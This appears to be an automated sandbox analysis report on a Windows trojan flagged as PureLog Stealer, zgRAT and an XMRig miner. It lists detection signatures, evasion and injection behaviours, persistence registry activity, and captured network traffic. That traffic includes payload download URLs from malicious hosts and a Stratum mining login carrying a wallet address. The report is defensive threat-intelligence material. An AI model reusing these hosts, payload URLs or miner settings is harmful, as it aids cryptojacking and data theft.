Windows Analysis Report
zlONcFaXkc.exe

Overview

General Information

Sample name:	zlONcFaXkc.exe renamed because original name is a hash value
Original sample name:	1c762a2cd186f1cde4b9e5d743eca3b5.exe
Analysis ID:	1430590
MD5:	1c762a2cd186f1cde4b9e5d743eca3b5
SHA1:	a0eff9fa7b5ada96c8acf483de9519a9e2548d80
SHA256:	a5b0d190fc09cd5c1ea07fa6b12a7dd4ab5f517c778fb60e4e14060e00ddecc8
Tags:	64exetrojan
Infos:

Detection

PureLog Stealer, Xmrig, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Malicious sample detected (through community Yara rule)

Sigma detected: Xmrig

Snort IDS alert for network traffic

Yara detected PureLog Stealer

Yara detected Xmrig cryptocurrency miner

Yara detected zgRAT

.NET source code contains potential unpacker

.NET source code contains very large array initializations

Connects to many ports of the same IP (likely port scanning)

Detected Stratum mining protocol

Found strings related to Crypto-Mining

Injects a PE file into a foreign processes

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Writes to foreign memory regions

Yara detected Costura Assembly Loader

Yara detected PersistenceViaHiddenTask

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to detect virtual machines (SLDT)

Contains long sleeps (>= 3 min)

Creates COM task schedule object (often to register a task for autostart)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Installs a Chrome extension

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file does not import any functions

Queries disk information (often used to detect virtual machines)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Chromium Browser Instance Executed With Custom Extension

Stores large binary data to the registry

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
xmrig	According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.	No Attribution	https://gridinsoft.com/xmrig https://www.crowdstrike.com/blog/new-kiss-a-dog-cryptojacking-campaign-targets-docker-and-kubernetes/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: zlONcFaXkc.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.196.10.233/dll/ghghghgfg.xml

Avira URL Cloud: Label: malware

Machine Learning detection for sample

Source: zlONcFaXkc.exe

Joe Sandbox ML: detected

Bitcoin Miner

Yara detected Xmrig cryptocurrency miner

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 1.2.Target.exe.1d0abdfaef0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.AddInProcess.exe.140000000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.AddInProcess.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Target.exe.1d0abdfaef0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000014.00000002.4120488458.000001978E306000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.4110650202.0000000140465000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.4120488458.000001978E2D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.4137105635.000001D0AC25F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.4110650202.0000000140799000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.4120488458.000001978E339000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.4137105635.000001D0ABDF5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.4110650202.0000000140000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Target.exe PID: 7384, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: AddInProcess.exe PID: 7492, type: MEMORYSTR

Detected Stratum mining protocol

Source: global traffic

TCP traffic: 192.168.2.4:49840 -> 185.196.10.233:35662 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"zephs72fkdmidnggbpghxjhndpe49prja1tvhrycwapy9vlqpybiqf527bidskd3jsjydzy5ubzexc3fnoxu4rbvgyx1b5vnkjf.rig_cpu","pass":"x","agent":"xmrig/6.21.0 (windows nt 10.0; win64; x64) libuv/1.44.2 msvc/2019","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}.

Found strings related to Crypto-Mining

Source: Target.exe, 00000001.00000002.4137105635.000001D0AC25F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: stratum+ssl://randomx.xmrig.com:443
Source: Target.exe, 00000001.00000002.4137105635.000001D0AC25F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: cryptonight/0
Source: Target.exe, 00000001.00000002.4137105635.000001D0AC25F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: -o, --url=URL URL of mining server
Source: Target.exe, 00000001.00000002.4137105635.000001D0ABDF5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: stratum+tcp://
Source: Target.exe, 00000001.00000002.4137105635.000001D0AC25F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Usage: xmrig [OPTIONS]
Source: Target.exe, 00000001.00000002.4137105635.000001D0AC25F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: XMRig 6.21.0

Source: unknown	HTTPS traffic detected: 40.126.29.9:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49786 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.126.29.9:443 -> 192.168.2.4:49952 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:50019 version: TLS 1.2

Source: zlONcFaXkc.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\weckb\source\repos\Hider\Hider\obj\x64\Release\Hider.pdb source: zcezeaqsuhi.exe, 00000002.00000000.1717795774.000002A5B9702000.00000002.00000001.01000000.00000008.sdmp, zcezeaqsuhi.exe, 00000002.00000002.2015898421.000002A5BB410000.00000002.00000001.00040000.00000008.sdmp, zcezeaqsuhi.exe.1.dr
Source:	Binary string: mscorlib.pdb source: WERD304.tmp.dmp.9.dr
Source:	Binary string: System.ni.pdbRSDS source: WERD304.tmp.dmp.9.dr
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9D12000.00000004.00000800.00020000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9DD0000.00000004.00000800.00020000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1680370592.000001DFC1F10000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: Lwbtkgrhgw.pdb source: zlONcFaXkc.exe, 00000000.00000002.1675678511.000001DFC1CB0000.00000004.08000000.00040000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9994000.00000004.00000800.00020000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB97BC000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WERD304.tmp.dmp.9.dr
Source:	Binary string: Hider.pdb source: WERD304.tmp.dmp.9.dr
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9D12000.00000004.00000800.00020000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9DD0000.00000004.00000800.00020000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1680370592.000001DFC1F10000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: WERD304.tmp.dmp.9.dr
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9D12000.00000004.00000800.00020000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1676626747.000001DFC1DB0000.00000004.08000000.00040000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9C49000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WERD304.tmp.dmp.9.dr
Source:	Binary string: protobuf-net.pdb source: zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9D12000.00000004.00000800.00020000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1676626747.000001DFC1DB0000.00000004.08000000.00040000.00000000.sdmp, zlONcFaXkc.exe, 00000000.00000002.1670015901.000001DFB9C49000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdb source: WERD304.tmp.dmp.9.dr
Source:	Binary string: System.pdb source: WERD304.tmp.dmp.9.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WERD304.tmp.dmp.9.dr
Source:	Binary string: System.Core.ni.pdb source: WERD304.tmp.dmp.9.dr

Creates COM task schedule object (often to register a task for autostart)

Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\Desktop\zlONcFaXkc.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IsFixedSize\Target.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zcezeaqsuhi.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2019714 ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile 192.168.2.4:49732 -> 179.43.170.230:80

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 185.196.10.233 ports 39001,0,1,3,35662,80,9

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.4:49730 -> 185.196.10.233:39001

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /ttt.exe HTTP/1.1Host: starsmm.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /dll/ghghghgfg.xml HTTP/1.1Host: 185.196.10.233Connection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 131.253.33.200 131.253.33.200
Source: Joe Sandbox View	IP Address: 162.159.61.3 162.159.61.3
Source: Joe Sandbox View	IP Address: 52.159.108.190 52.159.108.190
Source: Joe Sandbox View	IP Address: 13.107.213.41 13.107.213.41

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.29.9
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.29.9
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.29.9
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.29.9
Source: unknown	TCP traffic detected without corresponding DNS query: 23.6.117.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.6.117.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.6.117.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown	TCP traffic detected without corresponding DNS query: 23.6.117.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.6.117.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.6.117.16
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.21.237
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.21.237
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.200
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown	TCP traffic detected without corresponding DNS query: 13.107.21.237
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown	TCP traffic detected without corresponding DNS query: 23.6.117.16
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.29.9
Source: unknown	TCP traffic detected without corresponding DNS query: 23.6.117.16
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.29.9
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.29.9
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.231.163
Source: unknown	TCP traffic detected without corresponding DNS query: 23.11.231.163

Source: global traffic	HTTP traffic detected: GET /crx/blobs/AfQPRnlBHVf9QbAmjPnmJQnDwEcerxafOq8p01cAfJ5QoFk2s6gAMnMY_23BNiizXK2e-3smriJGTe2WOZO9s5X2xejbvoKpPILOKN2-0t9ZbrurACaLAMZSmuXX9slHldVQ07B5bvw6KCm_x6CONA/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_76_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/vendors.6c9316b09d3f8e566483.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic	HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/microsoft.119ca1abd9fdaf26e071.js HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
